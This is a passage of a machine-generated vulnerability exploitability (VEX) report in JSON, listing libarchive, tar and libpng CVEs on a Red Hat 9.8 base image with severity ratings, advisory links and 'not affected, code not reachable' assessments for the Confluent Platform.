              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5917",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw involves an 'off-by-one' miscalculation when handling prefixes and suffixes for file names. This can lead to a 1-byte write overflow. While seemingly small, such an overflow can corrupt adjacent memory, leading to unpredictable program behavior, crashes, or in specific circumstances, could be leveraged as a building block for more sophisticated exploitation. This bug affects libarchive versions prior to 3.8.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5917"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5917"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370874"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2588"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5917"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5917"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5918",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw can be triggered when file streams are piped into bsdtar, potentially allowing for reading past the end of the file. This out-of-bounds read can lead to unintended consequences, including unpredictable program behavior, memory corruption, or a denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5918"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5918"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370877"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2584"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5918"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5918"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-60753",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        400,
        835
      ],
      "description": "An issue was discovered in libarchive bsdtar before version 3.8.1 in function apply_substitution in file tar/subst.c when processing crafted -s substitution rules. This can cause unbounded memory allocation and lead to denial of service (Out-of-Memory crash).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-60753"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-60753"
        },
        {
          "url": "https://github.com/Papya-j/CVE/tree/main/CVE-2025-60753"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/2725"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60753"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-60753"
        }
      ],
      "published": "2025-11-05T16:15:40+00:00",
      "updated": "2026-06-17T09:50:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-64118",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        362,
        367
      ],
      "description": "node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-64118"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-64118"
        },
        {
          "url": "https://github.com/isaacs/node-tar"
        },
        {
          "url": "https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d"
        },
        {
          "url": "https://github.com/isaacs/node-tar/commit/5e1a8e638600d3c3a2969b4de6a6ec44fa8d74c9"
        },
        {
          "url": "https://github.com/isaacs/node-tar/issues/445"
        },
        {
          "url": "https://github.com/isaacs/node-tar/pull/446"
        },
        {
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-29xp-372q-xqph"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64118"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-64118"
        }
      ],
      "published": "2025-10-30T18:15:33+00:00",
      "updated": "2026-06-17T09:53:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-64505",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to version 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_do_quantize function when processing PNG files with malformed palette indices. The vulnerability occurs when palette_lookup array bounds are not validated against externally-supplied image data, allowing an attacker to craft a PNG file with out-of-range palette indices that trigger out-of-bounds memory access. This issue has been patched in version 1.6.51.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-64505"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-64505"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37%20%28v1.6.51%29"
        },
        {
          "url": "https://github.com/pnggroup/libpng/pull/748"
        },
        {
          "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-4952-h5wq-4m42"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64505"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7924-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8081-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-64505"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/11/22/1"
        }
      ],
      "published": "2025-11-25T00:15:47+00:00",
      "updated": "2026-06-17T09:54:28+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-15.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-64506",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_write_image_8bit function when processing 8-bit images through the simplified write API with convert_to_8bit enabled. The vulnerability affects 8-bit grayscale+alpha, RGB/RGBA, and images with incomplete row data. A conditional guard incorrectly allows 8-bit input to enter code expecting 16-bit input, causing reads up to 2 bytes beyond allocated buffer boundaries. This issue has been patched in version 1.6.51.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-64506"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-64506"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/2bd84c019c300b78e811743fbcddb67c9d9bf821"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/2bd84c019c300b78e811743fbcddb67c9d9bf821%20%28v1.6.51%29"
        },
        {
          "url": "https://github.com/pnggroup/libpng/pull/749"
        },
        {
          "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-qpr4-xm66-hww6"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64506"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7924-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-64506"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/11/22/1"
        }
      ],
